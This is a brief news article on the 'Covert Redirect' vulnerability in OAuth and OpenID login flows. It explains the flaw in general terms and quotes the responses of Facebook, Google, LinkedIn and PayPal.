Following in the wake of the Heartbleed security flaw, new holes have been found in identity authorization applications OAuth and OpenID. Many popular websites use these authentication tools, such as Google, Microsoft, Facebook, and LinkedIn. This security flaw has been dubbed “Covert Redirect” and it masquerades as a log-in popup window that appears on the affected site’s domain.
The Covert Redirect is based on a well-known exploit parameter. An example of this bug in operation would be if someone were to click on a malicious link on a website or email, and then get a pop up window in Facebook asking the user to authorize the app. Rather than using a “fake” domain similar to the one it’s trying to hack, this flaw will use the actual domain.
If the user does authorize the app and allow it to log into the site, personal data can be sent on to the hacker – ranging from control of the account to other personal information such as addresses and emails.
When the discovery of the attack was alerted to Facebook, Facebook responded that it “understood the risks associated with OAuth 2.0,” and “short of forcing every single application on the platform to use a whitelist,” fixing the flaw was “something that can’t be accomplished in the short term.”
Interesting words from such as huge internet presence such as Facebook. The flaw was also reported to Google, LinkedIn, and Microsoft, and various answers were given on how the companies would be responding to the flaw. Google said the problem was being tracked, and LinkedIn said the company had published a blog post on the hole.
PayPal also responded to the flaw, in a statement:
“When PayPal implemented OAuth2.0/OpenID, we engineered additional security measures to protect our merchants and customers. These measures protect PayPal customers from this specific OAuth2.0/OpenID vulnerability,” James Barrese, PayPal’s CTO, said.
All in all it seems that although the security issue isn’t as pressing and severe as Heartbleed, it’s still a large hole that needs to be fixed, and the inability to do so is rather perplexing.